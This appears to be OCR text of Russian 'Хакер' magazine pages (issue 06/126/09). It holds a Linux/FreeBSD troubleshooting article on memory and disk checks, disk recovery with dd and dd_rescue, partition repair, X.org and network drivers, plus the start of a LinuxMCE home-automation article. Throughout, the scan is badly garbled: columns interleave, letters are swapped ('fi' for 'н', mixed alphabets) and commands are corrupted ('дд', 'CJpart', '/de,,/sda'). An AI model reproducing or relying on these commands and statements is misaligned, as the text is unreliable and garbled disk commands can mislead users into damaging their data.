Чтобы попасть в однопользовательский режим

случаются с пеРИОДИЧfiОСТЬЮ

либо уже умер, либо находится в предсмертном

FreeBSD, требуется

тридцать минут, скорее всего, погорели только

СОСТОЯfiИИ. Чтобы не попасть впросак, специ­

fieKoTopbIe ячейки

алисты рекомендуют периодически

root.

выйди из редактора и fiабери

fiажать

ЗОЧfiое меню или набрать

'4'

exit,

в ответ

fia загру­

«bool-S» в KOMafiA­

fiОЙ строке загрузчика.

раз в час или

одной из плаfiОК. В случае

выхода из строя всего модуля памяти ядро

состоя

fi ие жесткого

уйдет в паfiИКУПРИ следующей же загрузке!

для отображения статистики

ЖЕЛЕЗНАЯ БОЛЕЗНЬ

Проверить па мять на сБОЙfiОСГЬ

ального чипа,

Часто ядро отказываетсязагружатьсяили кор­

труда. Самый ПрИМИТИВfiЫЙ способ

ректно работатьпо причине кривой реализации

ковать и распаковать большой объем

ACPIB чипсете

напри мер, дерево ИСХОДНЫХ текстов ядра:

или ВЮS'е материнской платы

fi е соста вляет -

FreeBSD

содержат даже не десятки. а сотни воркзраУfiДОВ

специ­

известная из которых имеfiуется

smartctl.

Пакетsmаrtmопtооls,содержащий программу предустановлен почти в любом дис­

smartctl, $ tar -czf -/src.tar.gz /usr!src

&.&

трибути ве

Llnux, а во Free 8SD доступеfi через

систему портов [sysu ti ls/sma rtmontools).

tar -xzf ··/src. tar. gz

Запустим

для материнских плат, облада ющихтакой fiепри­ ятной особенностью. Однаmочевидно. что С мо­

S.M.A.R.T..

Bcrpoefifioro в жесткий диск. 8

'пiх-системах тоже есть такие утилиты, самая

запа­

AafifibIx,

Раэработ~и ки операЦИОfiНЫХ СVoстем уже устали ругаться по этому поводу; ядра Liпuх и

проверять

диска, испол ьзуя утилиты

smartctl:

СБОЙfiые ячейки памяти вызовут коллизии

мента поступления материнской платы в продажу

при сверке КОfiТРОЛЬНЫХ сумм. и архиватор без

и до обfiаружеfiИЯ в ней ош ибок ПРОХОДИТ какое-то

замедлеfiИЯ сообщит об этом.

# smartctl



/de,,/sda

время, поэтому не стоит fiадеяться, что твоя

Другой [более правильны]] способ проверки

В появившейся на экраfiе табл и це нас Иfiтере­

свежекуплен fiая бажная АSUSуже есть в ~epHЫX

заключается в иСПОЛЬЗО8аfiии профеССИОfiаль­

суюттол ЬКО Д8е СТРОКИ:

списках ядра. Проблемы с АС PI и ПОДКОfiТРОЛЬ­

fiOrO

fibIM ему Ю-АРIС

достаточная программа, которая нетребует

первой из fiихотражеfiО количество переназна­

операЦИОfi fiОЙ системы ,цf1Я своей работы

чеНfiЫХ секторов. Зfiачеfiие, отличное от fiУЛЯ,

могутпроявляться по-раЗfiОМУ:

периодические за висания ОС, неработающие

Иfiструмеfiта

memtest86.

Это само­

RealLocated_Sector_Ct

и Temperature_Celsius. В ПОСЛеДfiей колонке

Ofia

клавиатура и мышь, сообщеfiИЯ ядра "м P-BIOS

ИЗfiачально присутствует

говорит о проблемах. Диск начинает сыпаться, и

bug' 8254 timer поt соппесtеd to IO-APIC", fiO чаще всего «желеЗfiЫЙ бар' даето себе знать уже fia

дистрибутивов и

число переназначенных секторов будеттол ько

этапе установки ОС. Инсталлятор просто входит в

Проверка памяти начнется автоматически.

Celsrus содержиттекущую температуру жесткого

ступор вовремя копироваfiИЯ файлов.

Программа

диска, которая

К счастью, зто легко обходится через ЯВfiое

различных алгоритмов тестироваfiИЯ, позтому

градусов

отключеfiие

APIC и/ил и ACPI в ядре. Для Linux

8 меню grub мfiОГИХ LiveCD Linux Просто перезаг­

рузи маШИfiУ и 8ыбери ПУfiктменю

memtest86.

memtest86 использует множество

расти. ПослеДfiЯЯ КОЛОfiка строки

Temperature_

fie ДОЛЖfiа превышаТI> 50- ти [36-45 градусов - идеальные условия!

ПРО8ерка можетзатянуться fiадолго.

Зfiачения

необходимо выбрать нужный пункт меню в

дую запустить

которые далеко не всегда имеютсвязь С реаль­

загрузчике

а утром проверить,

ХАКЕР

grub, fiажать'е',

06 /126/ 09

добавить в КОfiец по­

PeKoMefi­ memtest86 на ночь, лечь спать. fieT ли

в выводе

Kpacfiblx

S.M.A R.т. - это 8сеголишь цифры.

НЫМ состоянием жесткого диска. Более того,

~

085

!mdill 1/1

- (j i m@10ca1ho51:) - (~)­ - (О: О) -> Hconf; 9 ofeO: f1 а95=884 3 ор1: i On5=8

теп;с

О Пl1:u

1;'~

I .

1500

e1:her 00:11:d8:52;61;94 ; ne! 172 .16.67.143 oe1:mask OxffffeOOO broadca51: 172.16.95.255 med; а: E1:he,'ne! а""05е1еС1: (100baseТX те1: г; с О ",1:" 1500 100: f1a9s=8049me1:r';c О m1:U 16384 ;ne1:6 fe80::1%100 prefix1en 64 scopeid Ох3 ;ne1:6 ;:1 pref;x1en 128 i пе1: 127. О .0.1 netma5k OxffOOOOOO ogO: flags=88dl те1:Г; с О rn1:" 1456 ;"е1: 10.103.67.143 --> 172 .16.96.1 "е1:Пlаsk O"ffffffff - (j;ПI@10саlh051:)-(_.)­ -(0:0)-> •

l'

i

t'"\:~

GRUВВКАЧЕС~ ВЕ3АГРУ3ЧИКА

FREEBSD ЗагрузчикgruЬприcyrствуетпдеревепортоп

FreeBSD. Его можно использовать вместо стандарт­

РЕЗУЛЬТАТВЫЗОВА IFCONFIG БЕЗ АРГУМЕНТОВ

ного bootO. Файл !boot/grub!memL.lst в этом случае должен выглядетьпримернотак:

title FreeBSD исследования,проведенныекомпанией Google, показали. что

root (hdO,O)

в 60% процентах случаев вероятность гибели дисков никак не

сhаiпlоаdеr

+1

свяэана со значениями S.М.АЯ Т.. а единственный более-ме­ неедостоверный показатель

~

info

-

зто количество переназначен­

ных секторов. Но что, если дискуже почти умер, а информация

ПРИЧУДЫ МИСТЕРАХ

не может быть восстановлена из-за повторяющихся ошибок

За последнее время

чтения или перемещения головки? Тогда ГlрИ попытке коп,,­

проблемы с ним уже не являются серьезным препятствием. Те­

X.org

стал на порядок интеллектуальнее, и

• Сыплющийся, но

рования файлов ядро завалит dmesg сообщен"я ми

еще работоспособ­

а кома нда ср просто возвратитошибку. Для начала следует

ный жесткий диск

поп робовать отмонти ровать раздел и слить и нформацию с

монитора. 80 многих дистрибутивах настраиватьего вообще

вполне пригоден для

помощью dd на ДPYГO~I жесткий диск [здесь и далее /dev/sda ­

не нужно, установочные скрипты сами генерируют правиль­

хранения временных

сыплющийся диск.ldеv/sdЬ - новый диск)

ную конфигурацию. Но время ОТ времени Х-сервер дает сбо".

1/0 еггог,

AaHlibIx. Для зтого надо потереть табли­

перь Х-сервер умеет автоматически находитьустройства ввода,

подбирать правильные разрешение" частотуобновлен"я для

Причем. зачастую виновным оказывается сам пользователь

#

дд

if=!dev!sda of=!dev!sdb

conv~noerror,sync

цу разделов

или с"стема обновления пакетов. Если после загрузки вместо привычного окна лоnина ты ВИДИLIJЬ скуч ную черную консоль,

и создать новый

Если кол"чеСТ80сбойныхсекторов на диске невелико.то

раздел на уцелеВLIJей

dd скопирует

части диска.

После этого останется только выполнить fsck для всех фай­

димого драйвера и за канчивая проблемам" с каталогом /tmp.

ловых систем И жить дальше с новым д"ском. К сожалению.

Самое разумное,что можно сделать - попробовать повторно

• Чтобы убрать

трюк с применением dd срабатывает не всегда. В некоторых

запуститьХ-сервер командой

загрузочный экран

ситуациях диск оказы вается поврежденным настолько, что

ош ибки она выдаст на экран. В большинствеслучаев этого

и увидеть процесс

сбойные участки простираются на сотни тысяч ИЛИ даже

оказываетсядостаточнодля диагностики проблемы, но если

инициализации LIПUХ

миллионы секторов подряд! Завершения отработки dd при­

причины сбоя остаются загадкой. следует обратиться за более

во всей красе, удали

дется ждать нескол ько дней, за которые подопытный впол не

подробным разъяснением кфайлу /var/Log/Xorg.O.!og:

опции quiet и splash

можетскончаться. Лучшие умы планеты советуют исполь­

из строки. доступной

зовать специальную утилиту dd_rescue. с помощью которой

по клавише е

можно провести коп"рование диска С двух сторон. первый

в загрузчике grub.

диск, заполнив проблемныеучастки нулями.

значит, процедура запуска сервера завершиласьс ошибками. Этому может быть сотня приин, начиная ОТ отсутствия необхо­

# grep

ЕЕ

starix

и посмотреТЬ,какие

!varl1og;Xorg.O.10g

проход с начала диска, второй'- с конца. В результате на

Записываялоги, Х-сервер помечает все ошибки маркером

новом диске окажется вся информация за исключением

"(EEI,,, так что приведенная

проблемногоучастка. Делаем первый проход:

сигнализирующие о проблемах.

команда вы ведет тол ько записи,

Если чувствуешь, что ошибки самоетоятельнотебе не

I~

dd_rescue

-у -у

1G -1 sda. 10g



sda. ЬЬ \

Idev!sda !dev!sdb

исправ"ть. просто выполни команду«Х -сопfiguге», которая

сген ерирует новый конфигурацион н ый файл X.org.

Кроме сбоев. Х-сервер может злементарно тормозить. В

Когда дис к начнет безум но шелестеть, нажм ем , что­

этом случае винить следует уже не пользователя или дист­

бы заверLIJИТЬкопирован"е, и запускаем процесс копирова­

рибутив, а видеодрайвер. Современные графические тул­

киты и некоторые среды рабочего стола (КDЕ4, например]

н"я с конца:

практикуют переклады вание части работ по отрисовке

I

# dd_rescue -r -v -у 1G -1 sda.10g -о sda.bb\

!dev!sda !dev!sdb

графики на плечи граф"ческого ускорюеля. Выливается зто в скверные показатели производительности в систе­

мах. видеодрайвера которых не поддерживаютфункции Останавливаем процесс копирования после продолжи­

2D/ЗD-ускорения В частности. этим страдает стандарт­

тельного шелеста диска и отключаем умирающего. Другая

Ный ПVldlа -драйвер пv. Чтобы решить п

проблема

на са йт ПVld la.com и скачай последнийдрайвер для своей

-

утрата табли цы раздело в. которую еще совсем

роблему. зайди

недавно было принято решать с помощью шестнадцате­

ОС или сделай то же самое через системууправления

р"чного редактора. Сегодня же проще применить утилиту

пакетами.

gpart.

# CJpart

mпаТЕРЯННЫЙ ДРАЙВ:ЕР -и

!dev!sda !de'v!sda

Современные версии Liпuх и FreeBSD под завязку набиты драйверами даже для самого зкзотического оборудования.

~

086

Альтернативаgpari -. testdisk. более мощная" гибкая про­

Дни, когда для этих операц"онных систем приходилось

грамма с псевдо-графическиминтерфейсом.

индивидуально подбирать конфигурацию компа, прошли.

ХАКЕР

061"126/09

{tQ:@pcIO:O:4:0;

_ 'Nvidia

vепdоr

dcvSce class

sub~la5S

class-охО20000 card..ox80a7104} сhiр .. ОхОО6бl0dе геv-оJ.;;ll Согр' ЕФs:rD!"t ,Дфриr фiр IО/100/НQ/Fр_дчtо'jjtDS$"

hdr..oxOO

_ ~МCf-T .. ne:tworJ:. _­ ethernrt

ВЫВОД PCICONF: НАС ИНТЕРЕСУЕТ ИМЯ

УСТРОЙСТВА, ПОЛНОЕ И СОКРАЩЕННОЕ

~estDisk

6.10, Oa~a Recovery u~ili!y, July 2008 Christophe GRENIER hccp://www.cgsecuricy.org Disk /dev/adO - 120 GB / 111 GiB - CHS 232581 16 Сuггепс parti~ion STrUCcure: Рагtiтiоп STarc End - -:

... .

• 6:

I

~

~агп; ng: .. laming; IlIdsmn.

o:heclti"9

~hort N'мJ ~,\!" sеottогQН-4Н-4S'3),

I:~п;tiоn.s

iio'SU

byo;t~

inst,~d

QT

6fШВ.

skipping...

Bad end'j пg head (CHS and LBA don' t macch) Incorrect питЬег of heads/cylinder 255 (NTFS) != 16 (но) HPFS - NTFS 20798 7 1 31205 9 63 10490445

f'.rаП1iпg:

2

Р

.•.

s~ar~ing

f'.rarning: Bad 3 Р FreeBSD

(СН5

head

41612

and LBA don'c macch) 13 1 232575 14 63

~arning:
I

P",1iNoI1P

3~:;

~arning: Bad s~arting head (CHS and LBA I Next

dls:

pri~rYJ)dгtitiO/\(2)

Q'Pe~ OOHOxOJ){osl2 "~, КCFS, CI'« O~ ю.r...,~ 1IЮ;.) $ile~

c;ili:

Bad s.arcing head (CHS and LBA don'~ match) 31205 10 1 41612 12 63 4 Е ex~ended

s(Z0964BH-}.НИ2t)4) (10В/l.50/б3)-(10нns/б))d (lO~8/1/1)·{3UОS/9/Щг

5UZrb fs(1049O«O)

[ Backup

pr1l1U.ry~i'tion(3)

тгу

~fz:~ ~~Х~ШW~~Ы"~3~$~И~~~~14)

oths:

(1023/15/63)~(1~)/1516~)d

(ШОS/U/l)-{3И81rJJj'58)г

.0

dоп' т

loca.e

192490830 10490445

ща~сh)

par~icion

ВОССТАНАВЛИВАЕМТАБЛИЦУРАЗДЕЛОВС ПОМОЩЬЮ РЕЗУЛЬТАТ РАБОТЫ

Сегодня LIПUХ и

GPART

TESTDISK

FreeBSD легко встают на любой COBpe~eH­

Проверь. загрузилсяли дра.Йвер:

ный сервер,до~ашний компьютер или лэптоп и нетребуют специального конфигурирования. Загвоздка лишь в том. что

11- пdisитаррег

-1

драйвера для «железных новинок» появляются С некоторым опозданием. что вполнезаконо~ерно. но неприятно.

Все в порядке? Загружай модуль и конфигурируйсеть.

Еслитвоя свежекупленная железка никакне проявляет

работоспособl-ЮСТЬ, значит. ядро не подхватило ее во время

11-

modprobe I1dis,..rapper

загрузки. Такое может произойти в двух ситуациях: либо драйвер не был загружен во время инициализации системы.

ЛАТАЕМ СЕТИ

либо драйвера для такого устройства нет 8 ядре или ~одуле.

Пробле~ы с подключением~ сет" - бич новичков в

В любом случае следует опросить шину

Большинство дружелюбных к Гlользователю дистрибутивов

~

найденныхустройств и загруженныхдрайверов. Для зтого

находятсетевые интерфейсы сами и пытаются настроить

• Спасательный

можнО использовать утилиту

их средства ми О Н СР. С рабатывает зто далеко не всегда.

загрузочный диск­

Перво-наперво запусти команду «dmesg Iless» в LIПUХ или

W\Nw.sysresccd.org.

PCI

на предмет

lspCl в Liпuх или РСlсопf во

FreeBSD'

Linux.

links

«lеss/vаг/гuп/dmеsg.Ьооl»во FreeBSD и найди в ее выводе

1inux# lspci -v

сетевой адаптер. который ты V1спользуешьдля выхода в

• Восстановитель

freebsdJl. pciconf -1 -v

интернет или локальную сеть. HaГlpV1Mep:

таблицы разделов

gpart - ~ww.brzit\"a. На зкране ты увидишь все найденныево время инициа­

nfeO:
лизации ядра устройства И закрепленныеза ними модули

port ...

ИСР2

Networking Adapter>

~.

• Tesldisk - уни­

[драйвера). в первом случае имя ~одуля будетуказанов строке «KeГГlel modules:», во втором - в первой строке

Первое слово - зто название сетевого V1нтерфейса (в LIПUX

каждого устройства.

Он будет именоваться elhO или eth 1 Запусти команду ifconf'lg

В моем при~ере слово nfeO в самом начале отражает

без аргументов и найди в ее выводе зто название. Если его

всего И ВСЯ

имя устройства !сетевая карта) и закрепленный за ни~

нет - значит. интерфейс неактивен; если же в выводе нет

~<;_urity_qrg!wiki/

драйвер пfе. Если вместо имени ты увv!Ди шь слово «попе»

строки

-

J.

значит, ядро не загрузило соответствующV1Й драйвер.

inet - значит. ему не присвоен IP-адрес.Активиро­

-

~

TestDisk, • Спасатель данных

и пора отправляться на его поиски. Введи полное имя

# ifconEig

ПОV1ска

сетевая-маска

и ты найдешь и~я необходимого модуля

для восстановлен и я

вать интерфейс можно командой:

устройства и название операЦV10ННОЙ системы в строку

google.

версальная утилюа

интерфейс

inet

IР-адрес пеtшаsk

ddJescue -

'!'L'NW.

gагlоfr.dе/kuгt/li nuxi

up

или сообщение о том. что данное устройство пока не под­

ddrescue.

держивается ядро".

Обычно для выхода в локальную сеть не требуется ввод

Если Гlоиск драйвера не принес результатов, остае,.ся одно

дефолтового шлюза. так что после исполнения этой команды

• Утил ита nvclock­

- ждать выхода новой верси и ядра/ОС и надеяться. что в

доступ клокальной сети должен открыться. В случае. если

www.linuxhard'Nare.

нем появится поддерж~а твоего оборудования. Владельцы

стандартный шлюз все-таки ИСГlользуется. выполни следую­

Q[g/nvclock.

неподдерживае~ых сетевых адаптеров ~oгyт попытать

щую команду'

счастья с фре й м ворком собой модуль ядра

• Прослойка

N DISWra р рег. который представляет

Linux. ОН реализует прослойку для работы

# route

адд

default gw

IР-шлюза

драйверов NDIS INetwork Driver IпLегfасе SpecificatlOГlI.

NDISWгаррег для запуска сете в ых

Твой провайдерможет V1спользоватьРРРоЕ илV1 РРТР-сер­

драйверов Windows

Установи naKeT пdiswгаррег. скопируй сдиска каталог с офи­

вердля предоставлениядоступа к интернету.

- sourceforge.n~

циальны"Драйвером для

Настройка подобных подключенV1Йбыла подробно

!2.ШJеСls/пdiS\Nга ррег.

предназначенныхдля

Windows.

Windows.

найди в нем INF-файл и

выполни зту Ko~~aHДY:

описана в статье «Прорыв сквозь РРР". опубликован­ ной в майс~ом номере за

# ndis",rapper -i driver. inf ХАКЕР оь

/1261 09

2008 год. За сим я Гlрощаюсь

Удачиl::I:

~

087

юрий "BOBER. РДЭ30РЕНОВ

/ZLOY.BOBRfaGMAIL.COM /

"

"

МОИУМНЫИ

мОМ МОЯ

РЕПОСТЬ

Дистрибутив

LinuxMCE: бесплатное

решение для управления домом

Технология «умного дома» [Smart Но,те) уже не один год будоражит умы как разработчиковсофта и железа, так и обычных пользова­

телей. Ведь в домах существуетбольшое количество самых раз­ нообразныхэлектронныхустройств, при этом никак не связанных между собой. Если ты считаешь, что совместить их в единую сис­ тему очень дорого и под силутолько специалистамэкстра-класса,

тогда читай эту статью. Постараюсьтебя переубедить.

• ПРОЕКТ LINUXMCE

потребуетсяспециальныйадаптер [для ТСР!

обнаружени~ движени~ в поле зрения камеры

Название LinuxMCE !,vwwliПllXmсе.Dгg]

IP достаточно сетееухиl. Чтобы не запутаться

используется про грамма fvlоtiоп, речь о которой

расшифровываетсякак Liпuх Media Center

в одинаковых УСТРОЙСТ8ах. установленных

шла в статье «Сумеречный дозор". опуБЛl1КО­

EditlOn Можно с уееренностью предположить,

в разных комнатах. интерфейсупраеления

ванной в мартовском номерехэа

что этот дистрибути в позволяет

предлагает интерактивные планы помещений.

Продуманный механизм сценариев поз во­

обычный компьютер в современный домашний

в которых пользователь может "расположить»

л~ет легко объединить реакцию нескольких

развлекательный медиацентр [Ноте Theater

имеющиеся девайсы по своему усмотрению.

yCTpoikTB на наступление

РС. НТРС! Но наэначениеLiпuхМСЕ гораздо

В качестве камер наблюдения можно исполь­

событияlcобытий или критериS1 [еремя суток.

n ревратить

2008 год.

определен ного

зовать обычную ееб-камеру. нолучше всегодля

ден ь недели]. При этом ПОЛЬЗ0ватель получает

функциональная система автоматизации дома I

этой цели подходят IP-камерbI, поддеРЖИ8аю­

очень гибкий механизм управлениS1 режимом

Она способна управлять всеми доступными

щие различные вариантыудаленногоуправ­

работы системы охраны. Достаточноустано­

девайсами, начиная ОТ обычного (ну. не совсем]

ления. да и цена на них сегодня уже перестала

вить несколько вариантов. с помощью которых

определить. какдействовать системе в случае

шире -

Ноте АutоmаtlOП

System,

или полно­

выключателя света до устройств безопасности

бытьзаоблачной. Аналоговая видеокамера

[сигнализация и видеонаблюдение), а также

цепл~етс~ через плату видеозахвата. Захвачен­

возникновения тех или иных событий [поднять

климат-контроля и бытовых приборов. Чтобы

ное изображение с любой подключенной каме­

тревогу, отправить SMS. позвонить на указанный

номер и т.д.!. Есл и помещение уже имеет гото­

систему. УСТРОЙСТ8а

р ы можно просматривать в реал ьном времени.

должны уметь работать по протоколу ТСР!

включиться

записывать постоянно. по заданномуусловию

Byю систему охра н ы. Li пuхМСЕ способен легко

IP. X1O.INSTEON. PLCBus. EI8!KNX. Z-Wave

IBpeM~. движение. 380НОК 8 дверь и т.п.! или

интегрироваться и взаимодействовать с ней

или 1-Wlre. Для связи любого из нихс компом

использовать комбинацию этих методов. Для

Основой телефонии в LlпuхМСЕ являетсS1

~

088

8 единую

ХАК"

06 /126/ 09

cepBepAsterisk. Настройка параметров его

решен ием. И менно1УТ настраиваются все виды

работы при помощи несколько измененного

устройств и сервисов

FreePBX I'NWW. freepbx. ого) по нятна даже

проигрыватели,ТV-тюнеры и пр. Компьютер

орбитеров, которые можно использовать сов­

человеку, далекому oTVoIP, и не займет много

Соге должен бытьдостаточномощным, - на

местно с LlПuхМСЕ, приведен на страницеwiki.

времени. Для звонков с LinuxMCE на обычную

его плечи 8ыпадаетсамая больша~ нагрузка

linuxmce.ora/index. php/Ca legory:Orbiters. Нап ри­

телефоннуюл и н ию понадобитсяАТА- адаптер

по обработке данных. Должно быть достаточно

мер, в качестве мобильногоорбитераподойдут

[либо РСТ-длата для аналоrовыхлиний

СЛОТО8 расширения, чтобы подключить все уст­

Nokra770/7650/6620/N800/N81 O,IPAQ 221 0/5550/

а-ля DigiШТI

-1 p-телефоны' камеры,

подключенной к системному блоку клавиатуры

или пультов дистанционного упра вления. Список

ройства Также понадобится производительный

hx241 о, Cisco 7970 [XML-Orbiterl и др. Интерфейс

рения РХО - Прим. ред. J, а такжесофтофон

и

для подключенияновых устройствнаписа н на

IXlite, Bria, EkigaJ или IР-телефон. Некоторые

хранения информации можно исnол ьзовать

Ruby. Orbiter переведен на несколькоязы ков и

модел и телефонов позволя ютупра влять всем И

выделенн ы й NA5-сервер. Соге предоставляет

пордерживаетразличныеварианты оформле­

настройками LinuxMCE со своего экрана. До­

все необходи мое для загрузки тонких !бездис­

ния. Русского в спискедоступныхязыков нет;

сгупна функция follow-me !«следуй за мной»I,

ковыхl клиентов, которые затем используютс~ в

впрочем, большая часть используемыхтерминов

обеспечивающаяавтоматическоеперена­

качестве Media Director' ов.

должна быть понятна и без перевода

правление вывода на различныеустройства,

Media Olrector [или Media 5ta tlOпl- это обычный

к которы м подходитпол ьзователь, передвига­

компьютер, исполняющий роль медиа клиента,

УСТАНОВКАLINUXMCE

ясь по помещениям. При выходе пользователя

непосредственно выводящего видео на зкран

Ориенти ровочные систем ные требован ия для

из зоны управления система переключается

телевизора или музы ку В колонки. Его можно

разных компонентов приведены в документе,

С Bluetooth на сотовую сеть IGPR5/WAPj, что

использоватьтакже в качестведесктопа Ic

расположенном по адресу wlkl.llnuxmce.oro/

позволяет контролироватьдом и управлять им

Kubuntu!, персональноговидео рекордера IPVR].

rndex.pho/Hard\Naгe.Естественно,для Соге и

практически на любом расстоянии.

домофона или для видеосвязи. Плюс на него

Media Оiгесtогтребованияотличаются. Если не

TDM410P

с МОдУлем расши­

ФункциональностьНТРС, в общем-то,

eMKv.v. жесткий

диск, хотя в качеСТ8е системы

возложена задача поуправлению и мониторингу

предусмотрен захват и кодирование видеопо­

за всем происход~щим в доме· предлагается со­

тока, то для Соге рекомендуемым минимумом

Iфильмы, «живое» или записанное ТВ, музыка,

ответствующее зкранное меню, и подключаются

является компьютер класса Репtium-11173З М Гц

интернет-радио, фотки] с разных источни­

устройства управлений. Как правило, такие сис­

с 256 Мб RAM и 4 Гб хардом Iнепонятно почему,

ков, сохранение файлов на диск, управле­

темы не нужда ются в жестком диске и загружают­

у меня после установки всегда съедалось не

стандартна

-

проигрывание медиаконтента

ние оборудованием при помощи IR Iчерез трансмиттер GC1 001 или Bluetooth. Кроме того, имеющиЙСЯ в ко мплекте 5li т5егуегkейча с ­

5queezeCen terJ поз воляеттра нсл и ровать ау­ диопото к на други е ком nOHeHTbI 5та rt Ноте. Начало проекта датированофевралем 2007 года, когда через

n ять месяцев работы на

Ubuntu была практически полностью [без коммерческихмодулей ORM) портирована

система автоматизации Plutohome [построена на Oeblan]. Последующv.е версии LinuxMCE в качестве основы используют Kubuntu. Выбор был продиктованбольшими возможностями КОЕ по интеграции рабочих сред. Хотя нужно отметить, что релизы МСЕ выходят гораздо

позже Kubuntu. Так, верси~ 0704, базирующа­ яся на Kubuntu 7.04, появилась в августе 2007

[Kubuntu - апрель], текущая стабильная 071 О - в мае 2008. Как можно заметить, нумерация

«MEDIA DIRECTOR - ЭТО ОБЫЧНЫЙ КОМ­ ПЬЮТЕР, ИСПОЛНЯЮЩИЙ РОЛЬ МЕДИ­ АКЛИЕНТА, НЕПОСРЕДСТВЕННО ВЫВО­

ДЯЩЕГО ВИДЕО НА ЭКРАН ТЕЛЕВИЗОРА ИЛИ МУЗЫКУ В КОЛОНКИ. ЕГО МОЖНО ИСПОЛЬЗОВАТЬ ТАКЖЕ В КАЧЕСТВЕ ДЕ­

СКТОПА (С KUBUNTU), ПЕРСОНАЛЬНОГО

ВИДЕО РЕКОРДЕРА

(PVR), ДОМОФОНА ИЛИ

ДЛЯ ВИДЕОСВЯЗИ.».

LinuxMCE отражает версию Kubuntu, который послужилосновой. Релиз 081 О находится на

c~ по сети, но никто не запрещает использовать

данный момент в состоянии разработки,

хард В 5тaгt Ноте может быть несколько

- это

Media

менее 8,5 Гб]. Так как Medla Oirector'bl непос­ редственноучаствуютв выводе информации,

первый релиз на КDЕ4.Х. Учитыва~ большое

Oiгector' ов, установленных в разных комнатах

ДЛ~ них требуются качественные видео и

I(оличество изменений, вносимых вдистрибут­

и подключенных к BbIXOAHblM устройствам. Сам

звуковые карты Разработчикирекомендуютис­

и в, при нято реш е н ие с верс и И 081 О iпла н и ру­

Соге-сервер может быть «чистым" или гибрид­

пользовать с LiпuхМСЕ платы от NVidia lGeForce

ется полностью решить все проблемы, связан­

ным IHybrid), то есть быть еще и Media Оiгесtог'ом.

6200 - GeFoгce 8500J. Список TV-тюнеР08 и

ные с переходом на новый КОЕ) мигрировать

Hybrid - наверное, самый простой вариант

карт захвата ты найдешь по ссылке 'В том числе

на годовой цикл 8ыхода дистрибутива.

использования всей системы. Графический интерфейс управлен ия

СТРУКТУРА

SMART НОМЕ

поддерживаютс~ и устройства, подкл ючаемые

Media

Diгесtог'ом и всеми устройствами «умного дома»

НА

noU5BJ. Стабильная на момент написани~ этих

LINUXMCE

получил название Orblter. Он бывает нескольких

строк версия 071 О распространяется для

Прежде, чем приступить кболее подробному

8идов:универсальный С веб-интерфейсом, поз­

32- и 64-битныхредакций Kubuntu 7.10 (Gutsy

обзору возможностейдистрибутива. позна­

воляющий управлять системой с любого КОМ па;

GrЬЬоп]. Вдальнейшем будем рассматривать

мобильный, представляющий собой телефон Iс

установку и настройку именно этого релиза.

комимся со специальнымитермина ми,

-

он и

помогут понять принципы' на которых построен

устаН08ленной SуmЫап или Microsoft Mobile) и

Кстати, в конце марта I1стек срок поддержки

LlnuxMCE. Сердцем и одновременно мозгом

пордерживающий нужные функции , ПК или КП К,

десктопных версий 'Ubuntu 7.1 О, позтому

всей системы является выделенный (и единст­

подключенные через WiFi. Кроме того, в состав

обновлений к ним уже не предвидится.

венный в сетиJ сервер Соге. На нем собственно

Media Oirector'a входит«экранный»орбитер,

На странице загрузки можно выбратьодин из

и работают сервисы, предоста8ляемыезти м

позволяющийулучшитьуправлениепри помощи

двух 8ариаНТ08 уста нов очного образа. Если уже

ХАКЕР

06 /126/ 09

У,СТАНОВКА DVD-ВЕРСИИ ~

LINUXM'CE

DОyo;Juа;И"''1IПIIОU51J~tм5со .... lоao:tЭ$3n>i1di~pI'''i''r7

info

~ 'I'М. I".. L";I" з11 t'h-e m'!dia pl~J'b;"k.nd remot~ cClIt.rol ,,- 5Q!tw;1re 31'1~ mЗ~С! thl$ compuler rr.'J МlLmed!B pla.yllГo

• Для упрощения мы

О "о.

НАОТДЕЛЬНЫЙ

i'. use f.lher compule!i-.) and ОМо\ dt'l'lces(s) 10 pI~'ba(k Onlyinstall ~Me so~... ooth,! опое.

fI'I~~.

называем LiпuхМСЕ дистрибутивом, хотя на самом деле это

свободное дополне­

ВО ВРЕМЯ УСТАНОВКИСЛЕДУЕТ ВЫБРАТЬ РЕЖИМ CORE ИЛИ HYBRID

РАЗДЕЛ

ние кдистрибутиву

По умолчаниЮllpи использовании DVD инсталлятор

Kubuntu.

забираетхард IЩIIНОСThЮ> nопyrнозатирал всю инфу.

• Основой системы автоматизации

в

LinuxMCE является

Pluto (Q\!J.tQhome сот). Его код относи­

Но есП> один трюк, позволяющий поставить DVD-Bep­

«В КАЧЕСТВЕ КАМЕР НА­

сию в отдельный раздел. Идея проста: нужно за(.'Тавить уcrаНОВlЦИкnоверить, что система уже есть, а значит,

БЛЮДЕНИЯ ЛУЧШЕ ВСЕГО

ее нужно просто оБНОВИTh. д.'IЯ этоro в отдельном разделе (лучше, чтобы это был /dev/sdal), отформа­

ПОДХОДЯТ IP-КАМЕРbI».

тированномв одну из файловыхсистемLiпuх, создаем

тельно недавно стал

KaTa~oг/etc, ав ием-nyстойфаЙJIp]uto.conf. Во время

доступен под

устанОВКИ:llpограмманаходит / еtс/р!utо.сопfи пред­

GPL,

хоп\ готовые реше­

естьдискс КuЬuпtu 7.10, можно остановиться на двух СО­

ния распространяют­

дисках, обозначенных соответственно LiпuхМСЕ-СОl-IЗ86­

ся под коммерческой

rc2.iso и LlпuхМСЕ-СО2-i386-гс2.isо [для 64-битных систем

лицензией.

имени будет п рисугствовап> amd64J. Они содержат пакеты для

режиме будет работать наш сервер - НуЬпd [выбираем

конвертации системы в

YesJ или Соге (No, отказываемся от проигрыватеЛ51J. Если

лагает обновить имеющуюся систему.

8

LinuxMCE. Здесь есть один нюанс­

• Основная фило­

это должна быть «свежая» система без ка ких-либо апдейтов

на компьютере будет обнаружена видеокарта от NYidla,

софия LiпuхМСЕ

[кстати, от интернета на время установки лучше отключиться,

мастер предложитустановить проприетарные драйвера

выражена в девизе

чтобы операционка чего не вытянула). Иrlаче инсталлятор

[из интернета или с СО 11. Отказываться от этой процеду­

проекта:

LlnuxMCE может выдать ошибку и завершить работу.

ры не стоит. Далее система пробует настроить сетевые

«Ifyou're

uSlng а Media Center

Для «чистой» установки предназначен ОУО-диск Доступны

интерфейсы при помощи ОНСР При желании выбираем

РС, It'S all about the

два варианта

«No, i'll set

media, stupid, поt the

содержитдемо-видеохорошего качества. Надо сказать,

РС».

польза отнего невелика, поэтому смысла качать не вижу.

которого будет производиться обновление [в списке есть

ОУО устанавливаетсяне просто, а очень просто: достаточно

и российское]. Поумолчанию на сервере стартует ОНСР­

• При запущенном

выбратьжесткийдиск и ввести парольдляпользователя

сервис, раздающий IP-аАреса в диапазоне ·192.168

LlпuхМСЕдля пере­

